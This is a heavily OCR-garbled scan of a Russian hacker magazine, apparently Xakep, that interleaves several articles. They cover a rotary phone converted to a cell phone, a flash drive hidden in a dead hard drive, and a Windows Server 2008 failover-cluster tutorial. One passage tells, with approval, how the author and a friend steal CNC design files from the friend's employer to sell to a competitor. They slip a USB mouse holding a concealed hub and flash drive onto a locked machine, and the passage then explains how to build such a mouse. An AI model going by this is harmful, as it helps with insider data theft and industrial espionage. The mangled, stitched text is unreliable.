дящем звонке. Логику работы реально сделатьтакой, что после звонка 
схема тутже переходит на сканирование контакта снятия трубки. Как 
только мы снимаемтрубу — жметна принятие вызова. 

Хочу обратить внимание на блокировочные конденсаторы на всех 
контактах. Это обычные керамические кондеры на 33 нанофарады. Их 
предназначение — гасить наводки. Любой провод это, по сути, антенна, 
на которую наводятся из окружающего радиоэфира разные хаотичные 
колебания. Чем длиннее провод, тем сильней он ловит мусор. Искра, 
зазвонившая рядом мобила, электромагнитные колебания от мощного 
трансформатора или электромагнитная волна могут навести в проводе 
небольшое напряжение. А контроллер — он же чувствительный и быс- 
трый, он этот всплеск воспримет как полезный сигнал. Таким образом, 
из-за случайной наводки может произойти эффект поднятия трубки 
или приема звонка. У насже все критические шумы погасятся через 
конденсатор. 







Н ПЕЧАТНАЯ ПЛАТА 

Из-за моей нелюбви к бомжовым макетным платам тебе придется сразу 
изучать профессиональный подход и делать печатную плату. Надеюсь, 
ты уже изучил и освоил метод Лазерного утюга, ака ЛУТ? Если нет, то на 
дискетебя ждет статья с ликбезом, ее же сможешь найти на моем сайте. На 
крайний случай, еслиты фанат Ктулху, то можешь сделать все на макетной 
плате, благо схема несложная. Не потребуется даже включать мозг — со- 
единяй все проводками, как нарисовано, и будет тебе счастье. Рисунок 
печатной платы и программу для просмотра ты найдешь на диске. 






Н ПРОДУМЫВАЕМ БЛОКСВЯЗИ 

Отлично, провода мы вывели. Дело за малым — подключить их ксхеме 
управления и запрограммировать контроллер. 

Блоксвязи должен представлять собой простейшую схему, где мы будем 
микроконтроллером подсчитывать набранные цифры, а потом нажимать 
через оптроны на кнопки сотового телефона. В качестве контроллера 
я взял то, что под руку попалось — АТтеда8 в БІР-корпусе. Так как ис- 
ходники я незажимаю.тоты сможешьлегко переделать программу под 
любой другой микроконтроллер на ядре АѴР. 

Итак, смотри на схему и следуй за мыслью. 

Для начала лепим контроллер. Сам по себе он работать не будет, поэтому 
к нему надо подвести питание: плюс пять вольт и минус — он же земля 
или корпус. Не путай землю контроллера с землей сотового телефона! 
Они разделены между собой. Чтобы контроллер нормально запустился, 
нужно его вход ВЕ5ЕТ подтянуть через резистор к +5 вольтам. 
Микроконтроллер будетзажигать светодиоды в оптических развязках, 



В УПРАВЛЯЮЩАЯ ПРОГРАММА 

Раз мы применили контроллер, то нужна будет прошивка, куда же без 
нее. Исходный код ты найдешь на диске. Она снабжена подробнейшими 
комментариями, а значит, тебе будет нетрудно в ней разобраться (по 
крайней мере, я на это надеюсь). 

Опишу общий алгоритм работы. Итак, в начальном положении, после 
включения питания, схема ждет поднятия трубки (как начала звонка), 
попутно проверяя реле на входящий звонок. Просто сканируем контакт 
на замыкание. Как только замкнулся — все внимание надиски считаем 
импульсы на контакте «А». Начало счета импульсов определяем по 
замыканию контакта «Б», конец — по его размыканию. При этом надо 
не забывать отслеживать состояние контактора телефонной трубки 
(ведь мы всегда можем ее положить, таки не набрав номердо конца). 
Сосчитав импульсы, мы нажимаем соответствующую кнопку на телефо- 
не. Обрати внимание, что тут есть дополнительная задержка на дребезг 
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фон и динамиктрубки телефона. Разумеется, допотопный угольный 
микрофон и совковый динамик придется выкинуть и заменить на 
детали от гарнитуры, приклеив их двусторонним скотчем или приладив 
клеящим пистолетом. Ноу меня не оказалось гарнитуры, а покупать было 
совершеннозападло, да и громкость ее мало меня устраивала, поэтому 
я решил вывести микрофон и динамике сотового телефона. Благо, они 
там даже не припаяны — во всех мобилах, какие видел, эти две детали 
просто вынимаются, обнажая контакты. Воткним-то мы и припаяемся. 
Адальше все легко — провода сажаешь на провод, уходящий втрубку, 
и там припаиваешь оригинальные микрофон с ди на ми ком, также 
приклеивая их к корпусу. Еще неплохо бы соблюдать полярность, то есть: 
какой провод отрезал, стемже концом он и должен соединиться после 
прохождения шнура до трубки. 

Еслиутебя в телефонную трубку уходит всего трижилы, то придется ме- 
нять провод на четырехжильный. Непременно круглого сечения — чер- 
ный и страшный, можно втканевой оболочке. Если же хочешь оставить 
провод пружинкой, то придется потрошить гарнитуру по первому способу 
— в гарнитуре используются три жилы. 

В КОРМИМ ВКУСНО 

В качестве +5 вольт можешь заюзать обычную батарейку или блок 
никель-металлогидридных аккумуляторов. Купи батарейную кассету на 
четыре батареи; если туда засунуть четыре аккумулятора по 1 .2 вольта 
каждый, то они как раз дадут почти 5 вольт. Если собираешься юзать 
обычные батарейки, то возьми кассету натри батареи, таккаку обычной 



Выбрасываем все лишнее изтелефона. Хорошо виден конта кт снятия труб 



контактов. Дело втом, что конта кт за мы кается не мгновенно. Втечение 
считанных микросекундой как бы прыгает под действием сил упругости. 
Но контроллер-то быстрый, поэтому одно, с виду четкое, срабатывание 
можетзасчитать за десяток. Избежать этого можно при помощи неболь- 
шой задержки, которая переждет дребезжание и лишь потом перейдет к 
следующему подсчету. Во время разговора мы мониторим лишь контакт 
трубки. Как только трубку положили, коротко нажимаем на «сброс». 

Если пришел вызов, то замкнется оптрон, питающийся отсигнала с виб- 
ромотора. Схема будет отслеживать поднятиетрубки, после чего нажмет 
на «прием звонка». Очень просто: обычный конечный автомат и никаких 
премудростей! 



Н КОМПИЛЯЦИЯ И ПРОШИВКА 

Компилируется все в АѴРЗіисІіо. Проект разбит на несколько кусков 
— инициализация, вектора прерываний, определения, макросы и, собс- 
твенно, главная программа. Незабудь подключить их все. На выходе, в 
той же папке где и исходник, тебя будетждать Ьех-файл, который можно 
сразу прошить в контроллер. Скомпиленный вариантты также можешь 
найти на диске. Отом, как прошить микроконтроллер, уже не разупоми- 
налось на страницах ][. Да и на сайте ЬНрУ/еагуеІесігопісз.ги . в рубрике 
«АѴВ. Учебный курс» я расписал, как это сделать. 



г ВЫВОДИМ ЗВУК НАРУЖУ 

Тут тоже есть два пути — легкий и сложный. Легкий — это купить самую 
дешевую проводную гарнитуру и распотрошить ее, выведя на микро- 
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батарейки напряжение выше, чем у пальчикового аккума. 
Микроконтроллер потребляетпримерно 3 миллиампера, что дастболее 
месяца непрерывной работы в активном режиме, а если применить в 
контроллере режим энергосбережения, то срок действия продляется 
на годы. Блокбатарей закрепи внутри на клей или двусторонний скотч, 
чтобы не болтался (места внутри телефона навалом]. 

Разумеется, мобилу нужно иногда заряжать. В обычном режиме — раз 
в несколько дней, взависимости отмодели. Поскольку экранчикскрыт 
внутри, то уровень заряда ты не увидишь. Определяйся по интуиции 
— впрочем, тебе никто не мешает сделать небольшое смотровое окно, 
через которое будет видно мобильный телефон. Главное, сделать 
это незаметно, можно, например, прорезать в дне, чтобы не портить 
антуражную вещь. Также следует предусмотреть подключение извне 
зарядного устройства. Самый простой вариант — сделатьдырку в 
корпусе, а сам телефон закрепить так, чтобы можно было без проблем 
подключить провод. Если хочешь сделать все скрытно и красиво, то 
обрежь штекер от зарядника и втыкай его в телефон. Обрезанный шнур 
штекера припаивай клюбому удобномутебе разъему и выводи наружу. 
К проводу, который идет непосредственно ктрансформатору, припа- 
ивай ответную часть разъема. Получается незаметно и аккуратно. На 
случай, если мобила все же сядет и отрубится, надо вывести куда-ни- 



будь кнопку, параллельную кнопке Роѵѵег, чтобы можно было врубить 
ее без проблем, не вскрывая корпус. Собственно, можешь считать, что 
девайсутебя готов. 

Н ВЗРЫВАЕМ МОЗГ ОКРУЖАЮЩИМ 

Дальше начинаем форменный прикол. Вламываемся в гортранс и пос- 
реди пути, достав агрегат из сумки и поставив его на колени, начинаем 
накручивать диск, считывая номерок из винтажной записной книжки с 
кожаным переплетом. Выглядит просто потрясно — народтихо фигеет, 
не понимая, что это было. Репутацию городского сумасшедшего зара- 
ботаешь сразу. А если транспорт относительно тихий, вроде маршрутки 
стоящей в пробке, то окружающим будет слышен отголосок разговора 
твоего собеседника. И тут уже они засомневаются в своей адекватности. 
Для пущего угара, можешь поставить на звонок мелодию из серии «оШ 
рбопе». Тогда будет вообще натуралистично. 

А потом, вдоволь наигравшись, можешь задарить девайс кому-ни- 
будь в качестве прикольного и оригинального подарка. Л ибо бабушке 
в деревню, на всякий пожарный. Это будет проще, чем обучить ее 
пользоваться сотовым телефоном. Да и тяжело старикам пользоваться 
современными крошечными мобилками, с их-то зрением и не слушаю- 
щимися руками. □С 
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В СКАЗОЧНИК 

Рассказывая корефану байку, что, дескать, на самом деле все винты име- 
ют встроенный ІЧЗВ-интерфейс, используемый в процессе производства 
для наладки, я, тем временем, припаял своим газовым паяльником 
маленькие крокодильчики кторчащим из ІІЗВ-разъема проводам. Под- 
цепил крокодильчики к штырькам джамперов ЮЕ-винта и воткнул в него 
шнур питания. Шпиндель раскрутился, а я, отодвинув своей массивной 
тушей обалделого приятеля, недрогнувшей рукой вогнал в ІЧЗВ-порт 
разъем. Каково же было изумление чувака, когда винт тут же нашелся, 
прописавшись в системе, какІІЗВ РІазЬ Огіѵе. Я слил себе фильм и 
подорвался домой, оставив перца в жестоких думах о вечном. 

Н СЕКРЕТ 

Что поделать, каюсь: склонен я порой к дешевым эффектам. Вот и тут 
технологическая революция из серии «А мужики-то не знают» оказалась 



чистой воды подставой. Все было куда прозаичней — просто на днях 
сдох мой винт на тридцать гектар, служивший мне верой и правдой мно- 
го лет. Вотя и решил вернуть боевого товарища кжизни, сделав заодно 
трешевый девайс. Нет, я не стал в попытках реанимировать моральноус- 
таревшую железку тащить его к маньякам-восстановителям на комплекс 
РС3000. Я просто выкинул из него все потроха, нафаршировав взамен 
обычным флешем.Такчто.теперьему иудары нестрашны :). 

Ш ДЕЛАЕМ ФЛЕШКУ В СТИЛЕ ТЕХНО-ТРЕШ 

Для начала возьми любой дохлый винт. Крайнежелательно, чтобы это 
была модель с двумя-тремя блинами, так как в тонких винтах очень мало 
места. Мне не повезло, у меня на разделку пошел Махіог РігеЬаІІЗ, и что- 
либо запихать в его плоский корпус было чертовски тяжело! 

Винт нужно аккуратно вскрыть, стараясь не повредить внешний вид 
(выглядеть он должен естественно — без следов вторжения]. Если 
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Ввалился я как-то раз к другу в гости — надо было слить] 
стаю привычным движением из широких штанин свой 
— у меня-то все винты по старинке ЮЕ-шные, а он ух 
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огрызок ІІБВ-шнурка... 
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там есть какие-то наклейки, мешающие вскрытию, то отрывай их без 
жалости, а липкие следы смой спиртом или ацетоном, словнотак и было. 
Для вскрытия винта тебе, скорей всего, потребуются отвертки звездоч- 
кой или шестигранники — смотря, как повезет. Обзаведись подобным 
инструментом заранее — рано или поздно все равно пригодится, а запас, 
какизвестно, карман нетянет. 

Из гермозоны винта вывинти и выкинь все, что сможешь, а также сними 
блины со шпинделя. Сам шпиндель нетрогай, пускай крутится для виду. 
Еще потребуется проковырять дырку из гермозоны, ведущую под плату 
контроллера головки. Обычнотам есть какой-нибудь воздушный фильтр, 
так что остается только его вытащить. Приготовления корпуса законче- 
ны, осталось сварганитьэлектронику. 

В ГОТОВИМ ФАРШ 

Бери любой ІІ5В-хаб, он же ІІ5В-разветвитель, и недрогнувшей рукою 
вскрой ему внутренности. Я взял для своих целей самый дешевый раз- 
ветвитель, какой смог найти, какой-то ОетЬгісІ, купленный в ближайшем 




Потрошим ІІ5В-НиЬ 



комповом лабазе за пятьдесят рублей. Жуткий китаец в скрипучем кор- 
пусе и с неряшливого вида печатной платой. Для наших грязных целей 
подойдет как нельзя кстати, а если ненароком сдохнет, то и не жалко. 
Прикинув, какя буду пихать эту крестовину внутрь винта, я приуныл 
— места мало, а она здоровая. Хотя, если отпаять нафиг все разьемы, то 
получится очень даже ничего. 

Чтобы отпаять разъем, воспользуйся демонтажной оплеткой. Это такая 
медная мочалка, — продается в радиомагазинах. Если купить неудастся, 
то не беда. Возьми кусоктелевизионного кабеля и вытащи из него 
медную оплетку, либо сверни в несколько слоев многожильный медный 
провод, предварительно очищенный от изоляции. 

Оплетку нужно как следует смочить флюсом: рекомендую использовать 
или ЛТИ-120, илитолченую канифоль, растворенную в спирте. Потом 
накладываешь эту мочалку на контакт и прижимаешь сверху паяльни- 
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ком. Припой плавится итутже впитывается в оплетку, оставляя после 
себя чистую контактную площадку. С первого раза может не получиться, 
поэтомутренируйся. Когда оплетка пропитается полностью, откусывай 
этот конец и продолжай чистой мочалкой. 

После отпайки разъемов плата хаба становится заметно меньше и ее 
можно без труда запихать внутрь винта. 

Теперь бери флешку. Чем она меньше по габаритам, тем удобнее; иде- 
ально подойдутте, у которых кристалл памяти целиком помещается в 
разъем. У меня флешка оказаласьдревняя, со здоровенной платой. При- 
кинув место внутри винта, я понял, что без труда еетуда упихиваю вместе 
с хабом. Осталась только одна проблема — разъем на флешке напаян 
поверхностным монтажом, и такой оплеткой его уже не отпаяешь. Нужен 
термофен, который я, как назло, дал другану поюзать. Но ничего, выход 
есть! Можно просто разломать корпус разъема и припаяться к контактам 
напрямую или использовать отпаянный от хаба разъем. Ломать флешку 
мне было жалко, поэтому я поступил хитрее. Взяв родную колодку с 
разветвителя, я зеркально припаял ее с обратной стороны платы, убив 
сразу двух зайцев. Во-первых, я оставил нетронутым конструкцию флеш- 
диска. В расход пошел только грошовый НЗВ-хаб. Во-вторых, я вдвое 
сократил длину конструкции ЛазЬ-ЬиЬ — теперь плата флешки стала 
располагаться параллельно плате хаба. Если насовать в хаб несколько 
флешек, то у тебя будут уже логические диски :). И вся эта байда отлично 
запихалась в чрево винта! Обмотай все изолентой, чтобы не болталось 
и не замкнуло ничего ненужного. Затем завинчивай крышку, не забыв 
вывести провода из гермозоны через какое-нибудь отверстие. Главное, 
чтобы их было не видно из-под платы снаружи. 



Н ПРОМЫШЛЕННЫЙ ШПИОНАЖ. ТКІІЕ5Т0КѴ 

Не та к да в но, одного моего знакомца хорошо кинули на бабки на 
родном предприятии. Свесили на него жуткий долг, якобы за то, что он 
сорвал заказ. Его вины тутособо и не было, просто оказался крайним. 
Око за око, зуб за зуб. Решил он выровнять счет — своровать планы 



ЯК ѵ- 

Подключение колодки к штырькам джампера 
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Осталось подпаять проводки к ЮЕ-разъему. Лучше использовать 
штырьки от джампера, расположенные на той стороне платы, которая 
обращена котенке винта. Осмотри их внимательно и процарапай дорож- 
ки от штырьков до платы: их нужно откромсать полностью, чтобы разъем 
не был ни с чем соединен. Провода, торчащие из гермоблока, подпаяй 
к разьему изнутри. Теперь, если прикрутить плату на место, то ничего не 
будет видно. Словно, всегда таки было! 

Кусок провода, оставшийся отхаба, послужит для соединения нашего 
флеш-винта с компом. Можно его припаять напрямую к разъему или 
сделать на крокодильчиках, каку меня, но все же я предлагаю спаять 
тебе небольшой переходник. 

Возьми обычный разъем от ЮЕ-шлейфа и отрежь от него кусочек. 

Резать лучше всего раскаленным ножом, зашлифовав потом края. Кусок 
должен быть таким, чтобы без проблем воткнуться в гнездо джамперов. 

А чтобы не перепутать, сделай его асимметричным: сверху пять, а снизу 
— четыре дырки. Затем припаяй кколодочке проводки втом же порядке, 
в каком они идут от платы кхабу с флешкой в гермозоне. Как правило, 
проводки цветные, поэтому просто спаяй их по цветам. Если же тебе не 
повезло и они все одинаковые, то придется заранее прозвонить тесте- 
ром (на предмет кто есть кто]. 
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Готовый к встраиванию ІІЗВ-хаб 



нарезки детали на станке ЧПУ. План — это сложнейшая трехмерная фи- 
гура, описанная в математической форме и засунутая в дамп. По этому 
дампу движется резец станка, вытачивая деталь. Создать самомутакой 
дамп, особенно для сложной детали, — удовольствие не из дешевых. 
Вот и решил чел стырить инфу и продать ее конкурирующей фирме. 

Но проблема была в том, что планы приходили в станок напрямую из 
отдела проектирования завода, по шине РР0РІВІІ5 — это что-то вроде 
ВЬегпеС только п ромы шлейного применения с ди кой помехоустойчи- 
востью. А комп, управляющий станком, закрыт в железный шкаф, ключ 
от которого есть лишьу начальника цеха и заводского сисадмина. Из 
шкафа наружу лезет клавиатура, монитор да мышь. На компе крутится 
обычная Винда, и все файлы — пожалуйста, вотони, но как их оттуда 
выдрать? Задачка! 

Думали мыс ним долго, потом нас осенило... надо зарядить мышь! А что, 
мышьтам ІІЗВшная, это было известноточно, таккакмельком он ее видел. 
Дальше все просто: заряжаем в мышь ІІ5В-хаб, в хаб втыкаем флешку и 
припаиваем напрямую мышь. А выход хаба запаиваем на место мыши- 
ного провода. Сделали все красиво и незаметно. После чего «случай- 
но»уронили на ко н соль тяжелую дуру — мышь вдребезги, клавиатуре 
тоже досталось. Прозвучала стандартная песня: «Ой, насяльника, я не 
спицальна! Все куплю-возмещу!». Приносится новая клава и новая 
мышь, забитая флешем под завязку. Сисадмин, ничего не подозревая, 
собственноручно втыкает в задницу компу нашу мышу и закрывает сейф. 
В течение смены чел сливаете компов все, что только можно слить, 
после отрезает мышь от шнурка ножницами и идетписать заявление на 
увольнение. 



Н ФАРШИРОВАННАЯ МЫШЬ 

Ради прикола, можешь повторить и этот кулинарный эксперимент. 
Возьми любую ІІ5В-мышь, желательно в непрозрачном корпу- 
се. Засуньтуда хаб с флешкой. Если хаб не влезает, то его можно 
подрезать, что я и сделал. Внимательно изучив печатную плату, я 
вычеркнул все дорожки, которые можно безболезненно перерезать, 
не нарушая внутреннюю работу контроллера (это дорожки, ведущие 
к разъемам]. Таккакмневсе четыре разъема не нужны, то два я 
безжалостно отрезал ножницами. Полученная укороченная платка 
без проблем влезла в корпус мыши. Крысиный провод я откоцал и 
припаял прямо на плату хаба, а выводящий провод хаба, который 
должен был втыкаться в ИЗВ-порт компа, припаял на мышиный про- 
вод. Во второй разъем я воткнул свою флешку. Получилось, сточки 
зрения логики компа, что в хаб воткнута флешка и мышь, а сам хаб 
подключен к ИЗ В компа. 

Все, осталось только завинтить корпус, насовать на флешку поздрави- 
тельных картинок, песенок, видеороликов и можешь дарить кому-ни- 
будь та кую укуре иную мышь на день рождения. И пустьу именинника 
крышу снесет, когда вместе с мышьюу него появится еще и левый диск 
в системе. 

г ОІЛКО 

Отом, что таким же образом флешку можно заныкать в принтер или ска- 
нер, утаив, тем самым, инфу отзаинтересованных лиц, я даже говорить 
не буду — это вполне очевидно. Мысли нестандартно и преград на твоем 
пути не будет! Удачи, фрикер! т 
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УЛЬЯНА СМЕЛАЯ 






Безотказный 

ФАЙЛООБМЕННИК 



СТРОИМ ОТКАЗОУСТОЙЧИВЫЙ КЛАСТЕР ДЛЯ ФАЙЛОВОГО СЕРВЕРА В ѴѴШ00ѴѴ55ЕКѴЕР 2008 



Отказал сервер? При помощи службы кластеров ѴѴіп2к8 можно обеспечить 
восстановление приложений, ресурсов и служб. Возможных конфигураций 
серверных кластеров великое множество, но мы разберем самый интерес- 
ный и востребованный сценарий. 



О ПРОЕКТЕ 

Отказоустойчивым кластером (Раііоѵег Сіизіег) называют группу компьюте- 
ров, которая функционирует какединая система для обеспечения высокой 
доступности. Пользователь или программа видяттакой кластер, как один 
виртуальный сервер. Когда кластеризованный ресурс на одном изузлов 
выходит из строя, управление им возлагается на другой сервер. При восста- 
новлении ресурса исходный сервер возвращает себе функции управления 
и переходит в оперативный режим. Прелесть втом, что весь процесс вос- 
становления после отказа полностью прозрачен для пользователей. 

В ѴѴІп2к8 служба кластеров претерпела значительные изменения: упроще- 
но проведение всехопераций, начиная сэтапа развертывания, добавлена 
поддержка теневых копий для быстрого восстановления конфигурации 
кластера, усовершенствованы механизмы работы с сетью и алгоритм 
взаимодействия с системами хранения. Кроме того, появилась новая 



модель безопасности, которая поможет решить ряд проблем, возникавших 
ранее. Так, в предыдущей версии для функционированияузлатребовалась 
учетная запись службы кластеров, выполняемая с правами локального 
администратора. Такой пользователь в домене попадал под ряд политик, 
что могло вызвать сбой или недоступность сервиса. Теперь служба кластера 
использует локальную учетную запись с ограниченным набором прав, 
который позволяетей правильно функционировать. 

ПОДГОТОВИТЕЛЬНЫЕ МЕРОПРИЯТИЯ 

Требования к компьютерам, входящим в кластер, в общем-то, стандарт- 
ны. Они должны иметь сертифицированное оборудование (желательно 
одинаковое). Параметры связи на сетевых адаптерах, версии ѴѴІпсІоѵѵв, 
архитектура (32-разрядная, х64 или Капіит], патчи и прочее ПО должны 
совпадать. Нужно, чтобы все системы входили в один домен. Предпочти- 
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В настройках кластера тебе доступно 4 режима кворума 



тельна одинаковая роль рядового сервера. Файловая система 
— только ЫТЕ5. Избегай образования единичных точек отказа, 
например, наладив связь между узлами кластера по несколь- 
ким сетям. Еслиузла два, какв нашем сценарии, то достаточно 
соединить их между собой при помощи отдельных сетевых 
карт. Хотя опыт показывает, что большая часть этихтребова- 
ний — обычная перестраховка, это не означает, что их можно 
совсем не придерживаться. 

Диски или ШМ (бодісаіиті питЬегз, логические номера 
устройств), которые предполагается задействовать в кластере, 
должны быть доступны только узлам кластера. Для подклю- 
чения можно использовать І5С5І, диспетчер хранилища для 
сетей ЗАМ или любой другой интерфейс, предоставленный 
производителем системы хранения. Для проверки видимос- 
ти на одном из узлов будущего кластера следует перейти в 
Асітіпізігаііѵе Тооіз -> Сотриіег Мападетепі -> 5іогаде-> 

Оізк Мападетепі (Администрирование -^Управление Ком- 
пьютером -^Устройства хранения Управление дисками). 
Если нужные диски доступны в списке, значит, можно перехо- 
дить к следующему этапу. 

УСТАНОВКА ТРЕБУЕМЫХ КОМПОНЕНТОВ 

Как и все прочие сервисы ѴѴІп2к8, по умолчанию компонент 
Еаііоѵег Сіизіегіпд неустанавливается. Его необходимо 
добавить самостоятельно. Сделать это можно из окна Іпіііаі 
Сопіідигаііоп Тазкз («Задачи начальной настройки»), выбрав 
ссылку АсИ іеаіигез («Добавить компоненты») в области 
СизіотІ2еТЫз5егѵег(«Настроитьэтотсервер»). Или, как 
вариант, из «Диспетчера сервера» (Зегѵег Мападег). В резуль- 
тате появится мастер добавления компонентов АсИ Ееаіигез 
ѴѴігагсІ, который весьма лаконичен и прост. Отмечаем пункт 
ЕаіІоѵегСІизіегіпд, после чего нажимаем кнопку ІЧехі Іпзіаіі. И 
некоторое время ожидаем, пока кончится процессустановки и 
инициализации параметров. 

Следующий этап: устанавливаем сервис, ради которого и 
собирается кластер. В нашем случае — переходим в АсИ Роіе и 
на втором шаге «Мастера добавления ролей» (АсИ Роіе ѴѴігагсІ) 
выбираем Еііе Зегѵег. Нажимаем ІМехі и отмечаем службы 
ролей (здесь будут предложены Еііе Зегѵег, ОЕЗ, Резоигсе 
Мападег, Зегѵісез Иг Меіѵѵогк Еііе Зузіет и другие). Выбор 
некоторых из них (например, распределенной файловой 
системы ОЕЗ) потребует дополнительных настроек. Повторяем 
установку ЕаіІоѵегСІизіегіпд и Еііе Зегѵег на каждом узле из 
группы серверов. 

Советую проверить конфигурацию будущего кластера. 
Избежать проблем на раннем этапе, увидетьузкие места 
и сэкономить время поможет проверка на соответствие 
требованиям Еаііоѵег Сіизіег настроексерверов, сети и 
систем хранения данных. Тестирование производят из окна 



Выбор компонента для установки 



Еаііоѵег Сіизіег Мападетепі («Управление отказоустойчи- 
выми кластерами»), которое можно вызвать из Асітіпізігаііѵе 
Тооіз. В разделе Мападетепі выбираем ссылку Ѵаіісіаіе а 
Сопіідигаііоп («Проверить конфигурацию»). Появится «Мастер 
проверки конфигурации» (Ѵаіісіаіе а Сопіідигаііоп ѴѴігагсІ). На 
втором шаге мастера Зеіесі Зегѵегз ога Сіизіегуказываем на 
узлы, которые будут тестироваться. Для этого вбей имя узла в 
поле Епіегпате (или выбери изсписка при помощи Вгоѵѵзе) 
и нажми АсИ. Далее отмечаем тесты для выполнения. Перед 
созданием кластера рекомендуется пройти все проверки (Рип 
аіііезіз). А вот при подключении следующего узла некоторые 
тесты можно пропустить. По окончании проверок выводится 
информативная сводка (Зиттагу). Тесты, которые помечены 
зеленым цветом, считаются пройденными. 

Обрати внимание на тесты, которые помечены значком с 
восклицательным знаком (ѴѴагпіпд; есть еще и Ыоі АррІісаЫе, 
но они нетак критичны). Если не будут убраны все предупреж- 
дения, «Мастер создания кластера», который мы собираемся 
вскоре запустить, скорее всего, прекратит работу из-за ошиб- 
ки. Что делать, когда какие-то тесты не пройдены? Нажми 
на МогеаЬоиі сіизіег ѵаіібаііоп іезіз, — такможно вызвать 
соответствующий раздел справки. Авось, поможет разобрать- 
ся в ситуации. Чтобы просмотреть полный отчет потестирова- 
нию в окне веб-браузера, нажми ссылку Ѵіеѵѵ Рерогі. Устрани 
найденные проблемы и повтори тест. После закрытия мастера 
отчет сохраняется в Ьіті-файле в каталоге ЗузДешКооДХ 
С1изДег\КерогДз\Ѵа1ісІаЦіоп КерогЪ. Имя файла будет 
соответствовать дате и времени проведения теста. 

Новые кластеры создаются при помощи «Мастера создания 
кластера» (Сгеаіе Сіизіег ѴѴігагсІ). Вызывается он из окна 
консоли Еаііоѵег Сіизіег Мападетепі (нажатием на ссылку 
Сгеаіе а сіизіег). Консоль можно вызвать из Асітіпізігаііѵе 
Тооіз — или введя команду сіиасітіп.тзс в окнетерминала. 
Интерфейс консоли традиционен для ѴѴІп2к8. Окно разде- 
лено натри области: в левой области показаны кластеры, а 
подменю открывает доступ к настройкам. В центре выводится 
информация о выбранном объекте. В правойже части можно 
активировать действия, также доступные из контекстного 
меню. Но при помощи этой консоли нельзя управлять класте- 
рами предыдущих версий ѴѴІпсІоѵѵз, отмечу это специально. 
Затем по подсказкам мастера последовательно добавляем в 
список серверы, которые будут входить в состав кластера. На 




> ѵѵагпіпд 

• Варианты ѴѴІп2к8 
ѴѴеЬ Зегѵег и ЗіапсІагсІ 
не поддерживают 
кластерную службу 
Еаііоѵег Сіизіег. 

• ѴѴІп2к8 не поддер- 
живает І\ИВ (ІЧеіѵѵогк 
боасі Ваіапсіпд, 
Служба балансировки 
сетевой нагрузки) и 
Еаііоѵег Сіизіег на 
одном сервере. 
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странице Ассезз РоіпІіюгАсІтіпізіегіпд Ше Сіизіегуказываем имя кластера 
и его ІРѵ4-адрес. Проверяемустановки на странице Сопбгтабоп и, если 
все правильно, нажатием Ыехі начнем процесс создания кластера. Едва 
мастер закончит работу, появится страница 5иттагу. Посмотри, она не 
содержитзаписей об ошибках? Нет? Тогда создание кластера можно счи- 
татьзавершенным. Новый кластер появится в окне консоли Раііоѵег Сііізіег 
Мападетепі. 

Подключиться к кластеру, которого нет в списке, можно щелчком по записи 
Раііоѵег Сіизіег Мападетепі. Появится контекстное меню. Выбери в нем 
команду Мападе а Сіизіег. 

Кластер создан, но необходимо еще кое-что сделать для оптимизации 
работы. Перемещаясь по вкладкам, проверьустановки кластера. Чтобы 
сервера для обмена информацией внутри кластера не использовали сеть, 
предназначенную для передачи основного потока данных, нужно выбрать 
ее в списке Ыеіѵѵогкз. Далее — в контекстном меню перейти к пункту 
Ргорегііез («Свойства») и активировать параметр йо Кіо! АІІоѵѵіЬе Сіизіег 
Іо ІІзеТИІз Ыеіѵѵогк («Запретить кластеру использовать эту сеть»). Есть еще 
один момент: в идеале каждый узел должен иметь одинаковое количество 
сетевых адаптеров, а их имена — обладать такими названиями, которые по- 
могут администратору понять, к какой сети они подключены. Поумолчанию 
интерфейсы имеют имена вроде «Сіизіег Ыеіѵѵогк 1 », «Сіизіег Меіѵѵогк 2». 
Не очень-то удобно! Поэтому отметь сеть (в среднем окне будут выведены 
ее характеристики) и в контекстном менюткни пункт Репагше. Впиши новое 
имя сети. Аналогично поступаем и с остальными. 

Добавить новый узел в кластер очень просто. Для этого в поле КІосІез выби- 
раем АсИ КІосІе и следуем указаниям «Мастера добавления узла» (АсИ Ыобе 
ѴѴІгагсІ). Основной страницей мастера будетЗеІесіЗегѵеграде, на которой 
указываются данные нового сервера. После нажатия на Ыехі начнется про- 



Кластерный 
сетевой интерфейс 

Настоятельно рекомендую на каждый компьютер установить еще по 
одной сетевой карте и связать узлы отдельным сетевым кабелем. Это 
весьма пригодится, так как помимо НеапЬеаі-сообщений, которые 
предназначены для мониторинга состояния узлов кластера, по клас- 
терному сетевому интерфейсу будут идти данные синхронизации и 
управления. 



цесс добавления узла. Результат этой операции будет показан вЗиттагу. 
Сам видишь, ничего сложного. 

Хочешьзнать, что происходит при развертывании отказоустойчивого клас- 
тера в Асііѵе Оігесіогу? В контейнере «Компьютеры» создается ряд объектов 
виртуальных компьютеров (ѴСО — ѴіНиаІСогшриІегОЬІесІ:). Они относятся 
ко всем ресурсам сетевого имени кластера, создаваемым, как«Точки досту- 
па клиента» (САР — Сііепі Ассезз Роіпіз). САР понадобится даже для работы 
одноузлового кластера. Окно, требующее его создать, будет появляться 
несколько раз по ходу настроек — и ещеуспееттебе надоесть. Так что, в 
меню Асбоп выбери пун кт АсИ а гезоигсе, затем СІІеИ Ассезз Роіпі и следуй 
указаниям еще одного мастера. Фактически, он похож на предыдущий: 
необходимотолько указать незанятый ІР-адрес для САР и все. 

МОДЕЛИ КВОРУМА 

В обычном сценарии проблем не возникает, но что делать, если по какой-то 
причине кластер разделен? Например, отсутствует служебное сетевое под- 



Кворум в ѴѴіпгкв 

Для серверов ѴѴіпсіоѵѵб кворум - понятие не новое. Однако в реализа- 
ции \Ѵіп2к8 есть существенные изменения. Кворум - это не объект 
кластера, а целая концепция, позволяющая сохранить работоспособ- 
ность всей системы в случае недоступности отдельных ее элементов. 
Кластер-то должен действовать, как единая группа, представляющая 
собой логический сервер. Все узлы обязаны работать согласованно и 
выдавать одинаковую информацию. Поэтому при настройке класте- 
ра выбор типа кворума весьма важен. 

В ѴѴіп2кЗ «кворумом» называли общий диск с настройками клас- 
тера, потеря которого была критичной. Как вариант, предлагался 
кворум набора узлов, состоящий из общего ЗМВ-ресурса. В этом 
случае для функционирования кластера требовалось участие 
большинства узлов. В \Ѵіп2к8 используется модель единого кво- 
рума, определяющая результат на основе количества голосующих 
элементов кластера (свидетелей) . Новая модель кворума позво- 
ляет гарантировать, что только одна часть будет выступать в роли 
кластера. Раздел с кворумом определяется числом голосующих 
элементов (узлов, дисков-свидетелей), или возможностью доступа 
к определенному ресурсу, такому, как диск-свидетель. В первом 
варианте все элементы равны, то есть можно получить кворум и без 
диска свидетеля. 
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ключение. В этом случае фактически получаем два кластера, 
